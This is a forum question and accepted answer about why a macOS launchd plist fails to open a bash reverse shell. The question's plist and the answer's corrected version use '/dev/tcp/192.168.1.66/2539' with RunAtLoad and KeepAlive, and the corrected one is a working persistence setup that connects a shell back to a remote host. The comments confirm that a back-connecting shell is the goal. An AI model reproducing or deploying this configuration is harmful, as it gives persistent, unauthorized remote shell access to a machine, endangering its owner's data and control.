# Launchd File for reverse stream

Tags: bash, xml, launchd, reverse-tunnel

Does anyone have any ideas why this fails to execute a reverse stream connection when loaded?

```
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
        <key>Label</key>
        <string>com.unix.bash.plist</string>
        <key>ProgramArguments</key>
        <array>
                <string>/bin/bash</string>
                <string>-i</string>
                <string>&gt;&amp; /dev/tcp/192.168.1.66/2539 0&gt;&amp; 1</string>
        </array>
        <key>RunAtLoad</key>
        <true/>
        <key>StartInterval</key>
        <integer>100</integer>
        <key>KeepAlive</key>
        <true/>
</dict>
</plist>
```

Answer (score 1, accepted):

Redirections such as `<` or `>` (and in most Unixes, even the `/dev/tcp` special files) are part of the shell's command syntax, and can be used only inside a shell that supports them. However, *launchd* **does not** use any shell to start services – it creates the process directly using `execve()` or similar functions, passing a list of arguments that are not interpreted further.

In this case, `/bin/bash` is executed, and receives the following arguments:

- argv[0] = "`/bin/bash`"
- argv[1] = "`-i`"
- argv[2] = "`>& /dev/tcp/192.168.1.66/2539 0>& 1`"
- argv[3] = NULL

Bash interprets the second argument (argv[2]) as a file name of a shell script to run; since  such a file doesn't exist, bash exits.

---

Now, if you *need* the command to be interpreted by a shell, you will have to run a shell manually:

```
    <key>ProgramArguments</key>
    <array>
            <string>/bin/bash</string>
            <string>-c</string>
            <string>bash -i &gt;&amp; /dev/tcp/192.168.1.66/2539 0&gt;&amp; 1</string>
    </array>
```

Comment: so are you saying this cant work, or giving me a solution?

Comment: Thank you for answering my question. I know its not on topic but should this file now connect a shell back to 192.168.1.66 on 2539?